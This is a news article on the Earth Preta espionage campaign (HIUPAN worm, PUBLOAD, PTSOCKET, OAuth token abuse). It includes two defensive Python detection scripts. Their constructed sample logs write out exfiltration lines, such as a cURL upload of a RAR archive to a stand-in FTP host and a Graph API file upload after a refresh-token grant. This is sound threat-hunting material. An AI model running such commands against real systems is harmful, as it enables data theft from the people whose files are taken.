
Earth Preta targets Asia-Pacific with new worm and advanced tools

Earth Preta, a cyber-espionage group known for targeting government entities in the Asia-Pacific region, has significantly evolved its tactics and malware arsenal in recent attacks. The group has introduced new propagation methods, including a modified HIUPAN worm used to spread PUBLOAD, its primary malware, as well as new tools, FDMTP and PTSOCKET, for additional control and data exfiltration.

Earth Preta’s upgraded arsenal now centres on worm-based propagation, using an updated variant of the HIUPAN worm. HIUPAN spreads through removable drives and is used to deliver PUBLOAD, a control tool much favoured by the group.

PUBLOAD carries out reconnaissance on the compromised host, including network discovery and data collection. It uses RAR to archive the files it gathers and cURL to exfiltrate the archives.

Earth Preta has also introduced supplementary tools: FDMTP, a secondary control tool that mirrors PUBLOAD’s capabilities, and PTSOCKET, a new option for exfiltrating sensitive information.

Researchers also observed a shift away from the group’s traditional reliance on spear-phishing towards other delivery mechanisms. Rather than depending exclusively on email-based attacks, the group has begun distributing PUBLOAD via a version of HIUPAN that spreads through USB and other removable drives.

The attack chain explained. | Source: Trend Micro

The upgraded HIUPAN variant, previously used to propagate another piece of malware, ACNSHELL, now reads its settings from a configuration file. This file controls the worm’s propagation and watcher functions; the watcher monitors the system for the presence of removable drives.

“This HIUPAN variant has differences with the previously documented variant, which was used to propagate ACNSHELL, although its main utility within the attack chain stays the same,” researchers said.

When a removable drive is detected, HIUPAN copies itself and the other malicious files onto it, relying on users being tricked into executing the malware when they open the drive on another system.

Once PUBLOAD is running, it maps out the host and the surrounding network using a sequence of commands, giving the attackers details such as network configuration, active processes and potential weaknesses they can exploit.

The collected data is then exfiltrated in more than one way. Researchers observed that while PUBLOAD typically uses cURL to upload files to attacker-controlled FTP servers, an alternative route is PTSOCKET, which transfers data over a custom protocol and so is less likely to be picked up by controls that watch for standard FTP or HTTP uploads.
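The RAR-then-cURL staging and FTP upload described above (and the earlier note that PUBLOAD uses RAR to gather files and cURL to exfiltrate them) is a behaviour a defender can hunt for in process-creation telemetry. The following is an added example, not code from Trend Micro or from this article: it correlates RAR "add" commands with a subsequent cURL upload to an FTP URL on the same host inside a time window. The pipe-separated log format, the host names, the 30-minute window and the sample events are all constructed for the example.

```python
from collections import namedtuple
from datetime import datetime, timedelta

# Constructed Sysmon-style process-creation events, not real telemetry.
# Format: timestamp|host|parent image|image|command line
SAMPLE_EVENTS = r"""
2024-09-10T08:01:12Z|WS-APAC-07|explorer.exe|C:\Windows\System32\cmd.exe|cmd.exe /c dir
2024-09-10T08:03:40Z|WS-APAC-07|cmd.exe|C:\Users\Public\rar.exe|rar.exe a -r -hpPassw0rd C:\Users\Public\out.rar C:\Users\alice\Documents\*.docx
2024-09-10T08:05:02Z|WS-APAC-07|cmd.exe|C:\Users\Public\curl.exe|curl.exe -T C:\Users\Public\out.rar ftp://198.51.100.23/upload/ -u ftpuser:ftppass
2024-09-10T09:15:00Z|WS-APAC-12|explorer.exe|C:\Program Files\WinRAR\WinRAR.exe|WinRAR.exe a backup.rar C:\Users\bob\Pictures
2024-09-10T10:20:45Z|WS-APAC-03|cmd.exe|C:\Windows\System32\curl.exe|curl.exe --upload-file C:\temp\report.pdf ftp://203.0.113.8/in/
2024-09-10T11:42:31Z|WS-APAC-12|svchost.exe|C:\Windows\System32\curl.exe|curl.exe https://example.com/healthz
"""

Event = namedtuple("Event", "ts host parent image cmdline")
Finding = namedtuple("Finding", "host severity archive dest")


def parse_events(text):
    """Parse the constructed pipe-separated format into Event tuples."""
    events = []
    for line in text.strip().splitlines():
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append(Event(datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                            host, parent, image, cmdline))
    return events


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def rar_archive_target(ev):
    """Return the archive path if this event is a RAR 'add' command, else None."""
    if _basename(ev.image) not in ("rar.exe", "winrar.exe"):
        return None
    toks = ev.cmdline.split()
    if len(toks) < 3 or toks[1].lower() != "a":
        return None
    # The first non-switch token after the 'a' command is the archive name.
    for tok in toks[2:]:
        if not tok.startswith("-"):
            return tok
    return None


def curl_ftp_upload(ev):
    """Return (uploaded file, ftp URL) if curl uploads a file to FTP, else None."""
    if _basename(ev.image) != "curl.exe":
        return None
    toks = ev.cmdline.split()
    upload = None
    for i, tok in enumerate(toks):
        if tok in ("-T", "--upload-file") and i + 1 < len(toks):
            upload = toks[i + 1]
    dest = next((t for t in toks if t.lower().startswith(("ftp://", "ftps://"))), None)
    if upload and dest:
        return upload, dest
    return None


def detect(text, window=timedelta(minutes=30)):
    """Flag every curl FTP upload; rate it 'high' when RAR staged data on the same host within the window."""
    events = sorted(parse_events(text), key=lambda e: e.ts)
    recent_archives = {}  # host -> [(timestamp, archive path)]
    findings = []
    for ev in events:
        archive = rar_archive_target(ev)
        if archive:
            recent_archives.setdefault(ev.host, []).append((ev.ts, archive))
            continue
        hit = curl_ftp_upload(ev)
        if not hit:
            continue
        upload, dest = hit
        staged = [a for t, a in recent_archives.get(ev.host, []) if ev.ts - t <= window]
        findings.append(Finding(ev.host, "high" if staged else "medium", upload, dest))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f.severity.upper():6} {f.host}: {f.archive} -> {f.dest}")
```

On the constructed input, WS-APAC-07 is rated high (RAR archive created two minutes before the FTP upload), WS-APAC-03 is rated medium (FTP upload with no staging seen), and the WinRAR backup and the HTTPS health check are not flagged. A real rule would also want the parent process (PUBLOAD itself rather than cmd.exe) and the write location of the archive, neither of which this page documents.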

Perhaps the most concerning development in Earth Preta’s latest campaign is the possible use of cloud services for exfiltration. Based on observed network traffic, researchers believe the group may be abusing Microsoft’s cloud infrastructure, using OAuth refresh tokens to obtain access to services such as OneDrive and the Microsoft Graph API.
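Redeeming a refresh token is a normal part of the Microsoft identity platform: a client POSTs grant_type=refresh_token to the Entra ID token endpoint and then calls graph.microsoft.com with the access token it gets back. What makes the traffic suspicious is the process doing it. The block below is an added example, not code from Trend Micro or this article, and it does not reproduce Earth Preta’s tooling: it flags refresh-token grants from binaries outside an allowlist and lists any Graph API file writes the same process made. The proxy record format, the allowlist, the process names and the sample records are constructed assumptions; the token endpoint paths and the Graph drive-content URL shape are the real API.

```python
import re
from collections import namedtuple
from urllib.parse import urlsplit, parse_qs

# Constructed records from a TLS-inspecting egress proxy, not real traffic.
# Format: process image|HTTP method|URL|form body (empty when not captured)
SAMPLE_RECORDS = r"""
msedge.exe|POST|https://login.microsoftonline.com/common/oauth2/v2.0/token|grant_type=authorization_code&client_id=CLIENT-ID-REDACTED&code=CODE-REDACTED
msedge.exe|GET|https://graph.microsoft.com/v1.0/me|
OneDrive.exe|POST|https://login.microsoftonline.com/common/oauth2/v2.0/token|grant_type=refresh_token&client_id=CLIENT-ID-REDACTED&refresh_token=RT-REDACTED
C:\Users\Public\update.exe|POST|https://login.microsoftonline.com/common/oauth2/v2.0/token|grant_type=refresh_token&client_id=CLIENT-ID-REDACTED&refresh_token=RT-REDACTED&scope=https://graph.microsoft.com/.default
C:\Users\Public\update.exe|PUT|https://graph.microsoft.com/v1.0/me/drive/root:/Documents/out.rar:/content|
"""

# Assumed allowlist of binaries expected to redeem refresh tokens on a workstation.
EXPECTED_TOKEN_CLIENTS = {
    "msedge.exe", "chrome.exe", "firefox.exe", "onedrive.exe", "outlook.exe",
    "teams.exe", "ms-teams.exe", "winword.exe", "excel.exe", "powerpnt.exe",
}

# Entra ID (Azure AD) token endpoints: /<tenant>/oauth2/token (v1) and /oauth2/v2.0/token (v2).
TOKEN_HOSTS = {"login.microsoftonline.com", "login.windows.net", "login.microsoft.com"}
TOKEN_PATH_RE = re.compile(r"/oauth2(?:/v2\.0)?/token$")

Record = namedtuple("Record", "process method url body")
Finding = namedtuple("Finding", "process graph_uploads")


def parse_records(text):
    """Parse the constructed proxy format; keep only the lowercase image basename."""
    out = []
    for line in text.strip().splitlines():
        process, method, url, body = line.split("|", 3)
        basename = process.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        out.append(Record(basename, method.upper(), url, body))
    return out


def is_refresh_token_grant(rec):
    """True for a POST to a token endpoint whose body uses grant_type=refresh_token."""
    u = urlsplit(rec.url)
    if rec.method != "POST" or u.hostname not in TOKEN_HOSTS:
        return False
    if not TOKEN_PATH_RE.search(u.path):
        return False
    return "refresh_token" in parse_qs(rec.body).get("grant_type", [])


def is_graph_drive_write(rec):
    """True for a Graph call that writes file content into a OneDrive/SharePoint drive."""
    u = urlsplit(rec.url)
    return (u.hostname == "graph.microsoft.com"
            and rec.method in ("PUT", "POST")
            and "/drive" in u.path
            and (u.path.endswith("/content") or u.path.endswith("/createUploadSession")))


def detect(text):
    """Report non-allowlisted processes that redeemed a refresh token, with their Graph uploads."""
    records = parse_records(text)
    suspicious = {r.process for r in records
                  if is_refresh_token_grant(r) and r.process not in EXPECTED_TOKEN_CLIENTS}
    findings = []
    for proc in sorted(suspicious):
        uploads = [r.url for r in records if r.process == proc and is_graph_drive_write(r)]
        findings.append(Finding(proc, uploads))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_RECORDS):
        print(f"{f.process}: refresh_token grant; Graph writes: {f.graph_uploads or 'none'}")
```

On the constructed input only update.exe is reported, with the OneDrive content PUT it made afterwards; the browser’s authorization-code exchange and OneDrive.exe’s own token refresh are ignored. The same logic can be applied server-side to Entra ID sign-in logs, where the client application and user agent replace the local process name.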

Kumar Hemant
Deputy Editor at Candid.Technology. Hemant writes at the intersection of tech and culture and has a keen interest in science, social issues and international relations. You can contact him here: kumarhemant@pm.me